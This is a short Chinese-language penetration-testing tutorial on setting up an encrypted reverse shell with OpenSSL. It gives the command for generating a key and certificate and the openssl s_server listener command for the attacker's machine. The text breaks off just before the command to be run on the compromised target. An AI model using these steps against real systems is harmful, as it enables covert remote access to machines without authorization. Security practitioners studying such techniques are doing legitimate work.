利用OpenSSL搭建一個反彈shell
滲透測試時有很多方法可以獲得一個反彈shell,例如netcat、php、perl、.net、lolbins等等。但我最喜歡的方法之一利用是Openssl來獲得一個反彈shell。是的,就是那個幾乎每個https都要使用的庫,我們先用openssl來生成密鑰,最後再使用它來獲取一個反彈shell。
準備
首先我們需要在自己的機器上生成密鑰,這裡用kali來演示。
root@kali# openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
啟動監聽(滲透機器)
openssl s_server -quiet -key key.pem -cert cert.pem -port <PORT>
反彈shell(目標機器)
最後在目標機器,也就是你所攻破的機器,運行如下命令: